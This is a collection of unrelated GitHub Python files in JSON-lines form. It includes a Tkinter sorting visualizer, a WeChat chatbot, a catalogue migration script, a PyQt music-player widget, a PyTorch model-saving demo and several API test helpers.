Görselleştirici\")\r\nroot.maxsize(800,500)\r\nroot.config(bg=\"black\")\r\nsecilen_algoritma = StringVar()\r\n\r\ndef grafik_olustur(veri):\r\n canvas.delete(\"all\")\r\n canvas_height = 280\r\n canvas_width = 450\r\n x_width = canvas_width / (len(veri)+1)\r\n for i in range(len(veri)):\r\n x1 = i * x_width + 30\r\n y1 = canvas_height - veri[i]\r\n x2 = (i+1) * x_width + 10\r\n y2 = canvas_height\r\n canvas.create_rectangle(x1,y1,x2,y2,fill=\"purple\")\r\n canvas.create_text(x1+2,y1,anchor=SW,text=str(veri[i]))\r\n root.update_idletasks()\r\n\r\ndef rastgele_olustur():\r\n global veri\r\n if min_deger.get() == \"\":\r\n min = 1\r\n else:\r\n min = int(min_deger.get())\r\n if max_deger.get() == \"\":\r\n max = 100\r\n else:\r\n max = int(max_deger.get())\r\n if boyut.get() == \"\":\r\n size = 10\r\n else:\r\n size = int(boyut.get())\r\n veri = []\r\n for i in range(size):\r\n veri.append(random.randrange(min,max+1))\r\n grafik_olustur(veri)\r\n\r\ndef baslat():\r\n global veri\r\n if veri == []:\r\n messagebox.showinfo(title=\"Dikkat\", message=\"Lütfen önce rastgele verileri oluşturun.\")\r\n if algoritma_menusu.get() == \"Bubble Sort\":\r\n sort_algorithms.bubble_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Selection Sort\":\r\n sort_algorithms.selection_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Insertion Sort\":\r\n sort_algorithms.insertion_sort(veri, grafik_olustur)\r\n elif algoritma_menusu.get() == \"Quick Sort\":\r\n sort_algorithms.quick_sort(veri,0,len(veri)-1,grafik_olustur)\r\n grafik_olustur(veri)\r\n elif algoritma_menusu.get() == \"Merge Sort\":\r\n sort_algorithms.merge_sort(veri,grafik_olustur)\r\n\r\nframe = Frame(root,width=450,height=100,bg=\"grey\")\r\nframe.grid(row=0,column=0,padx=10,pady=5)\r\n\r\ncanvas = Canvas(root,width=450,height=280,bg=\"pink\")\r\ncanvas.grid(row=1,column=0,padx=10,pady=5)\r\n\r\nLabel(frame,text=\"Algoritma Seçiniz: \",bg=\"grey\").grid(row=0,column=0,padx=5,pady=5,sticky=W)\r\nalgoritma_menusu = ttk.Combobox(frame,textvariable=secilen_algoritma,values=[\"Bubble Sort\",\"Merge Sort\",\"Quick Sort\",\"Selection Sort\",\"Insertion 
Sort\"])\r\nalgoritma_menusu.grid(row=0,column=1,padx=5,pady=5)\r\nalgoritma_menusu.current(0)\r\n\r\nButton(text=\"Sıralamayı\\nBaşlat\",command=baslat,bg=\"purple\").grid(row=1,column=1,padx=5,pady=5)\r\nButton(text=\"Rastgele\\nOluştur\",command=rastgele_olustur,bg=\"purple\").grid(row=0,column=1,padx=5,pady=5)\r\n\r\nLabel(frame,text=\"Dizi Boyutu\", bg=\"purple\").grid(row=1,column=0,padx=5,pady=5,sticky=W)\r\nboyut =Entry(frame)\r\nboyut.insert(0,\"10\")\r\nboyut.grid(row=1,column=1,padx=5,pady=5,sticky=W)\r\n\r\nLabel(frame,text=\"Minimum\\nDeğer\", bg=\"purple\").grid(row=1,column=2,padx=5,pady=5,sticky=W)\r\nmin_deger = Entry(frame)\r\nmin_deger.grid(row=1,column=3,padx=5,pady=5,sticky=W)\r\n\r\nLabel(frame,text=\"Maksimum\\nDeğer\", bg=\"purple\").grid(row=1,column=4,padx=5,pady=5,sticky=W)\r\nmax_deger = Entry(frame)\r\nmax_deger.grid(row=1,column=5,padx=5,pady=5,sticky=W)\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"sumeyyebusra/Python-Projects","sub_path":"algorithm_visualizer/algorith_visualizer.py","file_name":"algorith_visualizer.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29588335938","text":"import json,random,re,os,time,hashlib\nimport itchat,requests\nfrom itchat.content import *\nfrom urllib import parse\n\n\ndef create_md5(string):#生成md5值\n text= hashlib.md5()\n text.update(string.encode(encoding='utf-8'))\n hl = text.hexdigest()\n return hl\n\n\n\ndef process(info,userid):\n name = itchat.search_friends(userName=userid)['RemarkName'] if itchat.search_friends(userName=userid)['RemarkName'] != '' else itchat.search_friends(userName=userid)['NickName']\n if info == '笑话':\n print('收到了{}的笑话请求'.format(name))\n xiaohua(userid)\n elif info[-2:] == '天气':\n print('收到{}的天气请求'.format(name))\n tianqi(info,userid)\n elif info == '我的头像':\n print('收到{}的头像请求'.format(name))\n getHeadImg(userid)\n else:\n print('收到{}的翻译请求'.format(name))\n translate(info,userid)\n\n\n\n #功能模块\n##########################################################\ndef translate(words,userid):#翻译单词\n ts = '' + str(int(time.time()*1000))\n salt = ts + str(random.randint(0,9))\n sign = create_md5('fanyideskweb' + words + salt + 'n%A-rKaT5fb[Gy?;N5@Tj')\n bv = create_md5('5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36')\n\n url = 'http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'\n headers = {\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'Referer':'http://fanyi.youdao.com/',\n 'Cookie':'OUTFOX_SEARCH_USER_ID=-1230324205@106.34.48.35; OUTFOX_SEARCH_USER_ID_NCOO=2014994095.072274; JSESSIONID=aaaHQbw0exCA0erFGop0w; ___rl__test__cookies=1567933779347',\n 'Host':'fanyi.youdao.com'\n }\n data = {\n 'i':words,\n 'from':'AUTO',\n 'to':'AUTO',\n 'smartresult':'dict',\n 'client':'fanyideskweb',\n 'salt':salt,\n 'sign':sign,\n 'ts':ts,\n 'bv':bv,\n 'doctype':'json',\n 'version':'2.1',\n 'keyfrom':'fanyi.web',\n 'action':'FY_BY_REALTlME'\n }\n result = requests.post(url,data=data,headers=headers).json()\n result = result['translateResult'][0][0]['tgt']\n itchat.send(result,toUserName=userid)\n\n\ndef xiaohua(userid):#处理笑话请求\n try:\n url = 'https://www.apiopen.top/satinApi?type=2&page=1'\n html = requests.get(url).content.decode('utf-8')\n xh_lists = json.loads(html)\n xh_info = xh_lists['data']\n # pprint.pprint(xh)\n lists = []\n for i in xh_info:\n 
lists.append(i['text'])\n xh = random.choice(lists)\n itchat.send(xh,toUserName=userid)\n except:\n itchat.send('请求失败!请稍后重试!',toUserName=userid)\n\n\n\ndef tianqi(info,userid):#处理天气信息\n city = re.findall(r'(.*?)天气', info)[0]\n city = parse.quote(city)\n url = 'https://www.apiopen.top/weatherApi?city={}'.format(city)\n try:\n tq = json.loads(requests.get(url).content.decode('utf-8'))\n if tq['code'] == '201':\n itchat.send(tq['msg'], toUserName=userid)\n else:\n tq_info = tq['data']\n city_info = tq_info['city']\n date = tq_info['forecast'][0]['date'] # 日期\n fengli = re.findall('\\d', tq_info['forecast'][0]['fengli'])[0] # 风力\n fengxiang = tq_info['forecast'][0]['fengxiang'] # 风向\n high = tq_info['forecast'][0]['high'] # 最高温度\n low = tq_info['forecast'][0]['low'] # 最低温度\n type = tq_info['forecast'][0]['type'] # 天气类型\n ganmao = tq_info['ganmao']\n itchat.send(\n '{}天气信息:\\n日期:{}\\n温度:{},{}\\n风力:{}级\\n风向:{}\\n天气类型:{}\\n感冒指数:{}'.format(city_info, date, high, low, fengli,\n fengxiang, type, ganmao),\n toUserName=userid)\n except:\n itchat.send('请求出错!\\n请判断城市输入是否有误!', toUserName=userid)\n\ndef getHeadImg(userid):#获取头像\n head_img = itchat.get_head_img(userName=userid)\n imgName = itchat.search_friends(userName=userid)['RemarkName'] if itchat.search_friends(userName=userid)['RemarkName'] != '' else itchat.search_friends(userName=userid)['NickName']\n with open('1.jpg','wb')as f:\n f.write(head_img)\n itchat.send_image('1.jpg',toUserName=userid)\n os.remove('1.jpg')\n\n\n@itchat.msg_register(TEXT,isFriendChat=True)\ndef getInfo(msg):\n userid = msg['FromUserName']\n info = msg['Text']\n process(info,userid)\n\n\nif __name__ == '__main__':\n itchat.auto_login(hotReload=True)\n itchat.run()","repo_name":"ubadly/wechat_robot","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"39013953367","text":"#!/usr/bin/env python3\n\"\"\"\nFind open-access LicensePools that do not have a Hyperlink\nwith an open access rel. 
If they have a delivery mechanism with\na resource, create a Hyperlink for the resource and identifier.\n\"\"\"\n\nimport os\nimport sys\n\nbin_dir = os.path.split(__file__)[0]\npackage_dir = os.path.join(bin_dir, \"..\")\nsys.path.append(os.path.abspath(package_dir))\n\nfrom core.model import ( # noqa: E402,F401\n production_session,\n Hyperlink,\n LicensePool,\n Resource,\n get_one_or_create,\n)\n\n_db = production_session()\n\nopen_access_pools = _db.query(LicensePool).filter(LicensePool.open_access==True) # noqa: E712,E225\n\npools_with_open_access_links = _db.query(LicensePool).join(\n Hyperlink,\n Hyperlink.identifier_id==LicensePool.identifier_id # noqa: E225\n ).filter(\n Hyperlink.rel==Hyperlink.OPEN_ACCESS_DOWNLOAD # noqa: E225\n ).filter(\n LicensePool.open_access==True # noqa: E225,E712\n )\n\npool_ids_with_open_access_links = [pool.id for pool in pools_with_open_access_links]\n\nopen_access_pools_without_open_access_links = open_access_pools.filter(~LicensePool.id.in_(pool_ids_with_open_access_links)) # noqa: E501\n\nprint(\"Found %d open access pools without open access links\" % open_access_pools_without_open_access_links.count())\n\nfixed = 0\nno_identifier = 0\nno_resource = 0\n\nfor pool in open_access_pools_without_open_access_links:\n\n if not pool.identifier:\n no_identifier += 1\n continue\n\n # Do we have a resource for this pool?\n if pool.delivery_mechanisms and pool.delivery_mechanisms[0].resource:\n resource = pool.delivery_mechanisms[0].resource\n identifier = pool.identifier\n\n link, is_new = get_one_or_create(\n _db, Hyperlink, identifier=identifier,\n resource=resource, license_pool=pool,\n data_source=pool.data_source, rel=Hyperlink.OPEN_ACCESS_DOWNLOAD,\n )\n\n if not is_new:\n print(\"Expected to create a new open access link for pool %s but one already existed\" % pool)\n else:\n fixed += 1\n pool.presentation_edition.set_open_access_link()\n\n if not fixed % 20:\n _db.commit()\n else:\n no_resource += 1\n\n_db.commit()\nprint(\"Fixed %d pools\" % fixed)\nprint(\"%d pools with no resource were not fixed\" % no_resource)\nprint(\"%d pools with no identifier were not fixed\" % no_identifier)\n","repo_name":"NYPL-Simplified/circulation","sub_path":"migration/20160722-fix-missing-hyperlinks.py","file_name":"20160722-fix-missing-hyperlinks.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"41"} +{"seq_id":"2447190702","text":"from typing import Optional, Union\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QKeySequence\nfrom PyQt5.QtWidgets import QHBoxLayout, QWidget, QVBoxLayout, QShortcut\n\nfrom modules.helpers.types.Decorators import override, connector\nfrom modules.models.view.builder.FontBuilder import FontBuilder\nfrom modules.models.view.builder.IconButtonStyle import IconButtonStyle\nfrom modules.models.view.builder.TextStyle import TextStyle\nfrom modules.screens.AbstractScreen import BaseView\nfrom modules.statics.view.Material import Paddings, Icons, Colors, Backgrounds, ColorBoxes\nfrom modules.widgets.Buttons import IconButton\nfrom modules.widgets.Cover import Cover, CoverProp\nfrom modules.widgets.Labels import LabelWithDefaultText\n\n\nclass MusicPlayerLeftSide(QHBoxLayout, BaseView):\n __song_info_layout: QVBoxLayout = None\n __play_buttons: QHBoxLayout = None\n\n __song_cover: Cover = None\n __label_song_artist: LabelWithDefaultText = None\n __label_song_title: LabelWithDefaultText = None\n\n __btn_prev_song: IconButton = None\n 
__btn_play_song: IconButton = None\n __btn_pause_song: IconButton = None\n __btn_next_song: IconButton = None\n\n def __init__(self, parent: Optional[\"QWidget\"] = None):\n super().__init__(parent)\n self.__is_playing_song = False\n self.__init_ui()\n self.set_is_playing(False)\n self.assign_shortcuts()\n\n def __init_ui(self) -> None:\n self.__song_cover = Cover()\n self.__song_cover.setFixedSize(64, 64)\n self.addWidget(self.__song_cover)\n\n self.__label_song_title = LabelWithDefaultText.build(\n width=128,\n font=FontBuilder.build(size=10, bold=True),\n light_mode_style=TextStyle(text_color=ColorBoxes.BLACK),\n dark_mode_style=TextStyle(text_color=ColorBoxes.WHITE)\n )\n self.__label_song_artist = LabelWithDefaultText.build(\n width=128,\n font=FontBuilder.build(size=9),\n light_mode_style=TextStyle(text_color=ColorBoxes.BLACK),\n dark_mode_style=TextStyle(text_color=ColorBoxes.WHITE)\n )\n\n self.__song_info_layout = QVBoxLayout()\n self.__song_info_layout.setContentsMargins(0, 0, 0, 0)\n self.__song_info_layout.setSpacing(0)\n\n self.addLayout(self.__song_info_layout, stretch=1)\n\n self.__song_info_layout.addStretch(0)\n self.__song_info_layout.addWidget(self.__label_song_title)\n self.__song_info_layout.addWidget(self.__label_song_artist)\n self.__song_info_layout.addStretch(0)\n\n # =================PREVIOUS - PLAY - NEXT=================\n self.__play_buttons = QHBoxLayout()\n self.__play_buttons.setContentsMargins(0, 0, 0, 0)\n self.__play_buttons.setSpacing(8)\n self.addLayout(self.__play_buttons)\n\n self.__btn_prev_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PREVIOUS.with_color(Colors.PRIMARY),\n light_mode_background=Backgrounds.CIRCLE_HIDDEN_PRIMARY_10,\n )\n )\n self.__play_buttons.addWidget(self.__btn_prev_song)\n\n self.__btn_play_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.X_LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PLAY.with_color(Colors.PRIMARY),\n dark_mode_icon=Icons.PLAY.with_color(Colors.WHITE),\n light_mode_background=Backgrounds.CIRCLE_PRIMARY_10,\n dark_mode_background=Backgrounds.CIRCLE_PRIMARY,\n ),\n )\n self.__play_buttons.addWidget(self.__btn_play_song)\n\n self.__btn_pause_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.X_LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.PAUSE.with_color(Colors.PRIMARY),\n dark_mode_icon=Icons.PAUSE.with_color(Colors.WHITE),\n light_mode_background=Backgrounds.CIRCLE_PRIMARY_10,\n dark_mode_background=Backgrounds.CIRCLE_PRIMARY,\n )\n )\n self.__play_buttons.addWidget(self.__btn_pause_song)\n\n self.__btn_next_song = IconButton.build(\n padding=Paddings.RELATIVE_50,\n size=Icons.LARGE,\n style=IconButtonStyle(\n light_mode_icon=Icons.NEXT.with_color(Colors.PRIMARY),\n light_mode_background=Backgrounds.CIRCLE_HIDDEN_PRIMARY_10,\n )\n )\n self.__play_buttons.addWidget(self.__btn_next_song)\n\n @override\n def assign_shortcuts(self) -> None:\n play_shortcut = QShortcut(QKeySequence(Qt.Key_Space), self.__btn_play_song)\n play_shortcut.activated.connect(self.__btn_play_song.click)\n\n pause_shortcut = QShortcut(QKeySequence(Qt.Key_Space), self.__btn_pause_song)\n pause_shortcut.activated.connect(self.__btn_pause_song.click)\n\n prev_shortcut = QShortcut(QKeySequence(Qt.Key_Left), self.__btn_prev_song)\n prev_shortcut.activated.connect(self.__btn_prev_song.click)\n\n next_shortcut = QShortcut(QKeySequence(Qt.Key_Right), self.__btn_next_song)\n 
next_shortcut.activated.connect(self.__btn_next_song.click)\n\n @override\n def apply_light_mode(self) -> None:\n self.__btn_next_song.apply_light_mode()\n self.__btn_prev_song.apply_light_mode()\n self.__btn_play_song.apply_light_mode()\n self.__btn_pause_song.apply_light_mode()\n self.__label_song_title.apply_light_mode()\n self.__label_song_artist.apply_light_mode()\n\n @override\n def apply_dark_mode(self) -> None:\n self.__btn_next_song.apply_dark_mode()\n self.__btn_prev_song.apply_dark_mode()\n self.__btn_play_song.apply_dark_mode()\n self.__btn_pause_song.apply_dark_mode()\n self.__label_song_title.apply_dark_mode()\n self.__label_song_artist.apply_dark_mode()\n\n @connector\n def set_onclick_prev_song(self, fn: callable) -> None:\n self.__btn_prev_song.clicked.connect(lambda: fn())\n\n @connector\n def set_onclick_play_song(self, fn: callable) -> None:\n self.__btn_play_song.clicked.connect(lambda: self.__onclick_play(fn))\n\n @connector\n def set_onclick_pause_song(self, fn: callable) -> None:\n self.__btn_pause_song.clicked.connect(lambda: self.__onclick_pause(fn))\n\n def __onclick_play(self, fn: callable) -> None:\n self.set_is_playing(True)\n fn()\n\n def __onclick_pause(self, fn: callable) -> None:\n self.set_is_playing(False)\n fn()\n\n @connector\n def set_onclick_next_song(self, fn: callable) -> None:\n self.__btn_next_song.clicked.connect(lambda: fn())\n\n def set_default_cover(self, byte_pixmap: bytes) -> None:\n cover = self.__create_cover(byte_pixmap)\n self.__song_cover.set_default_cover(cover)\n\n def set_default_title(self, text: str) -> None:\n self.__label_song_title.set_default_text(text)\n\n def set_default_artist(self, text: str) -> None:\n self.__label_song_artist.set_default_text(text)\n\n def set_cover(self, byte_pixmap: bytes) -> None:\n self.__song_cover.set_cover(self.__create_cover(byte_pixmap))\n\n def set_title(self, text: str) -> None:\n self.__label_song_title.setText(text)\n\n def set_artist(self, text: str) -> None:\n self.__label_song_artist.setText(text)\n\n def set_is_playing(self, enable: bool) -> None:\n self.__is_playing_song = enable\n self.__btn_play_song.setVisible(not enable)\n self.__btn_pause_song.setVisible(enable)\n\n def is_playing(self) -> bool:\n return self.__is_playing_song\n\n @staticmethod\n def __create_cover(byte_pixmap: bytes) -> Union[CoverProp, None]:\n if byte_pixmap is None:\n return None\n return CoverProp.from_bytes(byte_pixmap, width=64, height=64, radius=16)\n","repo_name":"Ananta0810/Meelody","sub_path":"modules/screens/music_bar/MusicPlayerLeftSide.py","file_name":"MusicPlayerLeftSide.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"11392705100","text":"#1--保存整个网络==torch.save(net,'文件名')\r\n# 加载时,得到整个网络==torch.load('文件名')\r\n#2--只保存网络的参数==torch.save(net.state_dict(),'文件名')\r\n# 加载前要先定义好和保存网络同样架构的网络,然后只需加载参数==net'.load_state_dict(torch.load_state_dict('文件名'))\r\n\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\n\r\nx=torch.unsqueeze(torch.linspace(-1,1,100),dim=1)\r\ny=x.pow(2)+0.1*torch.normal(torch.zeros(x.size()))\r\n\r\ndef save():\r\n net1=torch.nn.Sequential(\r\n torch.nn.Linear(1,20),\r\n torch.nn.ReLU(),\r\n torch.nn.Linear(20,1)\r\n )\r\n loss_func=torch.nn.MSELoss()\r\n optimizer=torch.optim.Adam(net1.parameters(),lr=0.02)\r\n\r\n for t in range(100):\r\n prediction = net1(x)\r\n loss = loss_func(prediction, y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # plot 
result\r\n plt.figure(1, figsize=(10, 3))\r\n plt.subplot(131)\r\n plt.title('Net1')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)\r\n\r\n #训练结束后,保存模型\r\n torch.save(net1,'net1.pkl')\r\n #只保存参数\r\n torch.save(net1.state_dict(),'net1_params.pkl')\r\n\r\ndef reload():\r\n net2=torch.load('net1.pkl')\r\n predict=net2(x)\r\n # plot result\r\n plt.subplot(132)\r\n plt.title('Net2')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), predict.data.numpy(), 'r-', lw=5)\r\n\r\ndef reload_param():\r\n net3=torch.nn.Sequential(\r\n torch.nn.Linear(1, 20),\r\n torch.nn.ReLU(),\r\n torch.nn.Linear(20, 1)\r\n )\r\n net3.load_state_dict(torch.load('net1_params.pkl'))\r\n predict = net3(x)\r\n\r\n # plot result\r\n plt.subplot(133)\r\n plt.title('Net3')\r\n plt.scatter(x.data.numpy(), y.data.numpy())\r\n plt.plot(x.data.numpy(), predict.data.numpy(), 'r-', lw=5)\r\n plt.show()\r\n\r\nif __name__=='__main__':\r\n save()\r\n\r\n reload()\r\n\r\n reload_param()","repo_name":"PeakGe/pytorch_learn","sub_path":"save_reload_test.py","file_name":"save_reload_test.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70247548923","text":"# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the \n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\". \n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. 
Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or \n# data to be ensured and, more generally, to use and operate it in the \n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license version 2 and that you accept its terms.\n\nfrom __future__ import absolute_import\nfrom brainvisa.processes import *\nfrom brainvisa import anatomist\nfrom soma import aims\nimport numpy as np\nfrom brainvisa.cortical_surface.surface_tools import texture_tools as texTls\n\nname = 'Anatomist Show Texture Extrema As Spheres'\nroles = ('viewer',)\nuserLevel = 0\nallowed_processes = ()\n\ndef validation():\n anatomist.validation()\n\nsignature = Signature(\n 'texture', ReadDiskItem('texture', 'aims Texture formats'),\n 'white_mesh',ReadDiskItem( 'Hemisphere White Mesh', 'aims mesh formats' ),\n 'sphere_size', Float(),\n)\n\ndef initialization( self ):\n self.linkParameters('white_mesh','texture' )\n self.sphere_size = 1.0\n\ndef execution( self, context ):\n context.write('use temporary files...')\n spheres_mesh_file = context.temporary( 'GIFTI file' )\n spheres_texture_file = context.temporary( 'GIFTI file' )\n white_mesh = aims.read(self.white_mesh.fullPath())\n texture = aims.read(self.texture.fullPath())\n atex = np.array(texture[0])\n gen = aims.SurfaceGenerator()\n spheres_mesh = aims.AimsSurfaceTriangle()\n vert = np.array(white_mesh.vertex()) # vertex coordinates\n extrema_tex = texTls.TextureExtrema(white_mesh, atex)\n extrema = np.where(extrema_tex)[0]\n spheres_texture = list()\n nb_vert_s = 64\n for ex in extrema:\n spheres_mesh += gen.sphere(vert[ex], self.sphere_size,10)\n spheres_texture.extend(extrema_tex[ex]*np.ones((nb_vert_s,1),np.int16))\n\n a_tex_out = np.array(spheres_texture)\n tex_out = aims.TimeTexture_S16()\n tex_out[0].assign(a_tex_out)\n a = anatomist.Anatomist()\n win = a.createWindow( 'Axial' )\n objects = [win]\n if len(spheres_mesh.vertex()) != 0:\n anamesh = a.toAObject(spheres_mesh)\n anamesh.releaseAppRef()\n anatex = a.toAObject(tex_out)\n anatex.releaseAppRef()\n anatex.setPalette('GREEN-RED-ufusion')\n fusionTexSurf = a.fusionObjects([anamesh, anatex],\n method='FusionTexSurfMethod')\n fusionTexSurf.releaseAppRef()\n win.addObjects( fusionTexSurf )\n objects += [fusionTexSurf]\n anamesh2 = a.toAObject(white_mesh)\n anamesh2.releaseAppRef()\n anatex2 = a.toAObject(texture)\n anatex2.releaseAppRef()\n anatex2.setPalette('Purple-Red + Stripes')\n fusionTexSurf2 = a.fusionObjects([anamesh2, anatex2],\n method='FusionTexSurfMethod')\n fusionTexSurf2.releaseAppRef()\n objects.append(fusionTexSurf2)\n win.addObjects( fusionTexSurf2 )\n return objects\n #return [win, anamesh,anatex,fusionTexSurf,anamesh2,fusionTexSurf2]\n\n","repo_name":"brainvisa/cortical_surface-gpl","sub_path":"brainvisa/toolboxes/cortical_surface/processes/viewers/AnatomistShowTextureExtremaAsSpheres.py","file_name":"AnatomistShowTextureExtremaAsSpheres.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"38702155285","text":"'''\n11.3.1 누락된 키 처리하기 setdefault() 와 defaultdict()\n딕셔너리에 존재하지 않는 키로 접근하면 예외가 발생한다. 기본값을 봔한하는 딕셔너리의 get함수를 사용하면\n이 예외를 피할 수 있다. 
setdefault() 함수는 get() 함수와 같지만 키가 누락된 경우 딕셔너리에 항복을 할당할 수 있다\n\n'''\n# p_table = {'aa':'aaa','bb':'bbb'}\n# print(p_table)\n# p_table.setdefault('cc','ccc')\n# print(p_table)\n\nfoodcount = {}\nfor food in ['egg','spam','spam','spam']:\n if not food in foodcount:\n foodcount[food] = 0\n foodcount[food] +=1\nprint(foodcount)\n\nfrom collections import Counter\nbreakfast = ['egg','spam','spam','spam']\ntest = Counter(breakfast)\nprint(test)\nprint(test.most_common(1))","repo_name":"dron512/pyauto","sub_path":"20201224/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10253387788","text":"# coding=utf-8\nimport requests\nfrom unittesttool.Operation_excel import oper_excel\nimport json\nclass inter():\n# 构造函数\n# def __init__(self, url, data, method):\n# res = self.run_main(url, data, method)\n# return res\n\n# post接口结构\n # post请求,参数:data(设计参数),url指定\n def send_post(self, url, data, cookies = None,files= None):\n # allow_redirects=False:禁止重定向的自动跳转\n if files:\n res = requests.post(url=url, data=data, cookies=cookies, verify=False, allow_redirects=False,files = files)\n\n else:\n res = requests.post(url=url, data=data, cookies=cookies, verify=False, allow_redirects=False,files = None)\n if str(res.status_code).startswith('2'):\n # 201、202等,请求连接成功\n print('接口连接状态', res.status_code, '接口状态正常')\n return res.json(),res.url\n elif str(res.status_code).startswith('3'):\n # 301、302等,重定向\n # response的header中获取重定向指向地址-location\n direct_url = res.headers[\"Location\"]\n print(\"数据重定向指向该网址\",direct_url)\n print('接口连接状态', res.status_code, ',————')\n return res,direct_url\n else:\n print('______接口连接状态', res.status_code,',接口状态异常')\n # return res.json()\n # get接口结构\n def send_get(self, url,params, cookies = None,return_value=None):\n # if header != None:\n # print(\"---\",params,type(params))\n res = requests.get(url=url, params=params, cookies = cookies, verify=False,allow_redirects=False)\n # else:\n # res = requests.get(url=url, params=params, verify=False,allow_redirects=False)\n if str(res.status_code).startswith('2'):\n # 201、202等,请求连接成功\n print('接口连接状态', res.status_code, '接口状态正常')\n if return_value.startswith(\"y\") or return_value.startswith(\"Y\"):\n # 获取返回的data数据\n try:\n result = res.json()[\"Data\"][0]\n excel = oper_excel(filename=\"../global_var/depend_data.xls\")\n i = len(result)\n j = 0\n key= []\n value = []\n for k in result:\n key.append(k)\n value.append(result[k])\n for i in range (len(key)):\n excel.write_value(i,0,key[i])\n if type(value[i]) == dict:\n excel.write_value(i,1,str(value[i]))\n else:\n excel.write_value(i, 1,value[i])\n except Exception as e:\n print(e)\n # print(\"返回\",res,res.url)\n return res,res.url\n elif str(res.status_code).startswith('3'):\n # 301、302等,重定向\n # response的header中获取重定向指向地址-location\n direct_url = res.headers[\"Location\"]\n print(\"数据重定向指向该网址\", direct_url)\n print('接口连接状态', res.status_code)\n return res, direct_url\n else:\n print('接口连接状态', res.status_code, ',接口状态异常')\n\n def run_main(self, url, method, data=None, files= None, cookies = None,return_value=None):\n if method == 'GET':\n res,url = self.send_get(url,data,cookies,return_value=return_value)\n else:\n res,url = self.send_post(url, data,cookies, files)\n # res为json可以做断点检查 ,重新处理为非json格式\n # return json.dumps(res, ensure_ascii=False)\n try:\n return res.json(),url\n except Exception as e:\n print(\"未返回json格式数据\",e)\n return 
res,url\n","repo_name":"0xqq/iqidao_interface","sub_path":"unittesttool/Requestdemo.py","file_name":"Requestdemo.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"38315389871","text":"#!/user/bin/env python\n#_*_ coding:utf-8 _*_\nimport unittest\nimport requests\nfrom client import *\n\nclass GetpatientImList:\n '''获取患者列表'''\n def setUp(self):\n self.url = 'https://tyh.120yibao.com/yb/customer/doctor/patientImList'\n self.token = Client.TOKEN\n self.client = Client(url=self.url)\n def tearDown(self):\n self.client.result()\n def test_patientImList(self):\n cl = self.client\n cl.set_data({\"Yb-Yh-Client\":\"0\",\"Yb-Yh-Token\":self.token,\"doctorUserId\":\"141273\"})\n cl.send()\n cl.equal(cl.status_code,0)\n cl.less_than(cl.times,200)\n cl.equal(cl.json.get('info'),'请求成功')\n","repo_name":"hehe0001/yb_test","sub_path":"yb/PatientImList.py","file_name":"PatientImList.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30964644668","text":"from typing import List\nimport sys\nimport shutil\nimport subprocess\n\n\ndef patch_sys_path() -> None:\n \"\"\"Modify sys.path to include all paths from the\n current environment.\n \"\"\"\n syspath = _get_external_sys_path()\n for each in reversed(syspath):\n if each not in sys.path:\n sys.path.insert(0, each)\n\n\ndef _get_external_sys_path() -> List[str]:\n executable = shutil.which(\"python\") or \"python\"\n if executable == sys.executable: # not in virtualenv\n return []\n ret = (\n 